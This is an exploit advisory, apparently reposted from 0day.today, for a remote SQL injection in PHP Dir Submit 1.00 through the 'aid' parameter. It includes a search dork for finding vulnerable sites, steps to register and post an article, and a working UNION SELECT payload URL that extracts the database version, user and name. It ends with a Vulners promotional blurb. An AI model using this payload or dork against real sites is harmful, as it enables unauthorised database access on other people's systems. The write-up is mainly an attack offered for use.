PHP Dir Submit Version 1.00 (aid) Remote SQL Injection Vuln. Vulnerability in PHP Dir Submit script allows remote SQL injection
=======================================================
PHP Dir Submit (aid) Remote SQL Injection Vulnerability
=======================================================
======================================================================
[รยป] Script : PHP Dir Submit Version 1.00 (aid) Remote SQL Injection Vuln
[รยป] Language : php
[รยป] Dork : Powered by PHP Dir Submit - Directory Submission Script
[รยป] Script site : http://www.phpdirsubmit.com
[รยป] Founder: Mr.tro0oqy <- from Yemen
======================================================================
exploit:
--------
u must be registered in site
step1:
go to :
-------
www.xxx.com/path/index.php?menu=signup
-------
step2:
after that :
-------
add post from here
www.xxx.com/index.php?menu=articles
-------
step3:
press on "View Article"
and start to inject
http://www.xxx.com/path/index.php?menu=showarticle&aid=3+and+1=0/**/union/**/select/**/1,version(),3,4,user(),database(),7,8,9,10,11--
--------
demo:
--------
http://demo.phpdirsubmit.com
--------
# 0day.today [2018-04-14] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo